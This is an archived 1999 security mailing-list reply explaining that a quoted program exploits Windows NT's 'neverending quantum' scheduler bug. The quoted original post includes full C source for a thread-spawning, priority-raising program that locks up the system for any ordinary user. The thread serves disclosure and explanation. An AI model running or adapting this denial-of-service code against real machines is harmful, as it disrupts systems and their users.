Re: ordinary users bringing NT to its knees [repost]

From: David Schwartz (davidsat_private)
Date: Thu Jun 10 1999 - 12:34:23 PDT

Next message: Simple Nomad: "Info on Worm.ExploreZip"

Previous message: Aleph One: "Re: Exploit in the newest AIM 2.0"
Maybe in reply to: kiva: "ordinary users bringing NT to its knees [repost]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

	This is just an exploit for the 'neverending quantum' bug that's been known
for ages. See http://www.sysinternals.com/tips.htm#NEQuantum It has nothing
to do with the number of threads running (except that you need at least one
per CPU).

	The bug occurs when a thread changes its priority. NT changes the thread's
priority, but also gives it a new execution quantum. By repeating this
process, a single thread can monopolize a CPU.

	DS

> Hi,
>
> sorry if problems like this are known, but I thought I'd post this just
> incase...
>
> I was curious at how well NT could handle *lots* of threads, so I
> wrote the
> following. It basically locks up the system with an inability to kill the
> process because (I) never get the task manager up. Pretty bad since an
> ordinary user can run it :/
>
> my system: 2xPPro with NT4 (SP5), 128megs RAM.
>
> cheers
>
> ----------------------------
>
> /*
>  * frootcake.c
>  * kivaat_private
>  *
>  * this tests NT at coping with *really dodgy* code...
>  * it totally brings my SMP box to being unusable (SP5)
>  */
>
> #include <windows.h>
> #include <stdio.h>
>
> void poobah();
>
> DWORD WINAPI thread_func (LPVOID lpv)
> {
>     DWORD id;
>     HANDLE h;
>     BOOL success = 1;
>
>     h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
>
>     while (success){
>         switch (GetThreadPriority (h)){
>         case THREAD_PRIORITY_ABOVE_NORMAL:
>             success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
>             break;
>         case THREAD_PRIORITY_BELOW_NORMAL:
>             success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
>             break;
>         case THREAD_PRIORITY_HIGHEST:
>             success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
>             break;
>         case THREAD_PRIORITY_IDLE:
>             success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
>             break;
>         case THREAD_PRIORITY_LOWEST:
>             success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
>             break;
>         case THREAD_PRIORITY_NORMAL:
>             success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
>             break;
>         }
>     }
>
>     poobah();
>     return 0;
> }
>
> void poobah()
> {
>     DWORD id;
>     HANDLE h;
>
>     h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
>     SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
>
>     poobah();
> }
>
> int main ()
> {
>     printf ("frootcake - kivaat_private\n");
>     poobah();
>     return 0;
> }
>
> /* eof */
>

Next message: Simple Nomad: "Info on Worm.ExploreZip"
Previous message: Aleph One: "Re: Exploit in the newest AIM 2.0"
Maybe in reply to: kiva: "ordinary users bringing NT to its knees [repost]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:49:00 PDT